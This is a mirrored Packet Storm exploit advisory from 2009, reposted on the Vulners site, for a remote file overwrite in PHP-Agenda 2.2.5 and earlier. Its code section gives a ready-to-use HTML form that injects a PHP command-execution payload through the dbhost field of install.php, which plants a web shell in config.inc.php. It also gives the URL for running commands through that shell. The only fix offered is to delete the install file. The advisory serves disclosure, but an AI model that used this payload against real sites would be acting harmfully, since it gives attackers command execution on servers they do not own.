Lucene search
K

PHP-Agenda 2.2.5 File Overwrite

🗓️ 10 Apr 2009 00:00:00Reported by Salvatore FrestaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

PHP-Agenda 2.2.5 File Overwrite vulnerability, risk of remote code executio

Code
`******* Salvatore "drosophila" Fresta *******  
  
[+] Application: PHP-agenda  
[+] Version: <= 2.2.5  
[+] Website: http://php-agenda.sourceforge.net  
  
[+] Bugs: [A] Remote File Overwriting  
  
[+] Exploitation: Remote  
[+] Date: 10 Apr 2009  
  
[+] Discovered by: Salvatore "drosophila" Fresta  
[+] Author: Salvatore "drosophila" Fresta  
[+] Contact: e-mail: [email protected]  
  
  
*************************************************  
  
[+] Menu  
  
1) Bugs  
2) Code  
3) Fix  
  
  
*************************************************  
  
[+] Bugs  
  
  
- [A] Remote File Overwriting  
  
[-] Risk: hight  
[-] File affected: install.php  
  
This bug allows a guest to overwrite config.inc.php  
inserting PHP code.  
  
  
*************************************************  
  
[+] Code  
  
  
- [A] Remote File Overwriting  
  
<html>  
<head>PHP-agenda <= 2.2.5 - Remote File Overwriting</head>  
<body>  
<form action="http://www.site.com/path/install.php" method="post">  
<input type="text" name="dbhost" size="30" value="'; system($_GET['cmd']); echo '">  
<input type="submit" value="Exploit!" >  
</form>  
</body>  
</head>  
  
To execute commands:  
  
http://www.site.com/path/config.inc.php?cmd=uname -a  
  
  
*************************************************  
  
[+] Fix  
  
You must delete install.php after installation.  
  
  
*************************************************  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation